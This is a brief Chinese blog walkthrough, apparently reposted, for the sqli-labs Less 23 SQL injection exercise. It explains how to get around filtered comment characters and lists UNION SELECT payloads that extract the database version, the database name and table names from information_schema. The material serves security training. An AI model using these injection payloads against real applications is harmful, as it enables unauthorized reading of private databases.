数据库
首页 > 数据库> > sqli-labs less23

sqli-labs less23

作者:互联网

#sqli-labs less 23

这一关的与第一关的区别有两个,一个是注释符# --+被过滤了

所以我们得闭合第二个单引号

另一个区别是不能用order by 来判断字段数了

具体原因请参照 https://www.jianshu.com/p/2602430f8ee4

’ union select 1,2,3,4 or ‘1’='1

’ union select 1,version(),3 or ‘1’='1

’ union select 1,database(),3 or ‘1’='1

剩下的跟第一关less1 差不多

’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 or ‘1’='1

标签:less23,union,labs,sqli,table,select,schema
来源: https://blog.csdn.net/qq_45106794/article/details/102753246